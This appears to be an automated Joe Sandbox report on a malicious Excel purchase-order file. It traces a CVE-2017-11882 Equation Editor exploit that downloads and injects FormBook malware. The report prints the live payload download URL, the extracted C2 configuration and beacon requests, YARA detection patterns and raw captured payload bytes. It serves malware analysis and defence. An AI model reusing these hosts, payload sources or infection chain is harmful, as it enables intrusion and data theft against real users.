Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HME AG PO 2091.xlsx

Overview

General Information

Sample Name:HME AG PO 2091.xlsx
Analysis ID:553050
MD5:29ee298412e6d2cb968a883563837cbe
SHA1:7ed1c5713ba7ff23e36fecdedb0f0c012f6c647b
SHA256:22355ce0bfc092836a0d62f6cbb54d03aa6fb26091ecd1907922fb9f6e0d0880
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1444 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2860 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 2256 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8EDDCC35719034649F6947B2B08BCDF3)
      • word.exe (PID: 1612 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8EDDCC35719034649F6947B2B08BCDF3)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cscript.exe (PID: 2980 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
            • cmd.exe (PID: 1292 cmdline: /c del "C:\Users\user\AppData\Roaming\word.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.1.word.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.1.word.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.1.word.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        5.2.word.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.word.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 91.203.68.162, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2860, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2860, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2860, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 2256

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: HME AG PO 2091.xlsxVirustotal: Detection: 42%Perma Link
          Source: HME AG PO 2091.xlsxReversingLabs: Detection: 32%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://rfr.lt/ctf.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exeReversingLabs: Detection: 41%
          Source: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dllReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Roaming\word.exeReversingLabs: Detection: 41%
          Machine Learning detection for sampleShow sources
          Source: HME AG PO 2091.xlsxJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\word.exeJoe Sandbox ML: detected
          Source: 5.2.word.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.word.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cscript.exe.2abf840.7.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.word.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.word.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.word.exe.430000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.word.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cscript.exe.4d22e0.0.unpackAvira: Label: TR/Patched.Ren.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: word.exe, word.exe, 00000005.00000002.519963830.0000000000980000.00000040.00000001.sdmp, word.exe, 00000005.00000003.460762852.0000000000230000.00000004.00000001.sdmp, word.exe, 00000005.00000002.520313707.0000000000B00000.00000040.00000001.sdmp, word.exe, 00000005.00000003.461783755.0000000000440000.00000004.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000002.674110480.00000000022E0000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.674256925.0000000002460000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.517708547.0000000001FF0000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdbN source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
          Source: Binary string: cscript.pdb source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00402630 FindFirstFileA,
          Source: global trafficDNS query: name: rfr.lt
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.203.68.162:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.203.68.162:80

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.ponto-bras.space
          Source: C:\Windows\explorer.exeDomain query: www.hydrogendatapower.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rthearts.com/nk6l/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: NANO-ASLV NANO-ASLV
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1Host: www.ponto-bras.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 07:05:05 GMTContent-Type: application/octet-streamContent-Length: 248302Last-Modified: Thu, 13 Jan 2022 11:11:05 GMTConnection: keep-aliveETag: "61e008c9-3c9ee"Expires: Sun, 13 Feb 2022 07:05:05 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /ctf.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rfr.ltConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Jan 2022 07:06:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Dc: gcp-europe-west1X-Request-ID: 99fb20a9-766c-40f0-9df4-b158c5fb1252X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd5059eac695c85-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 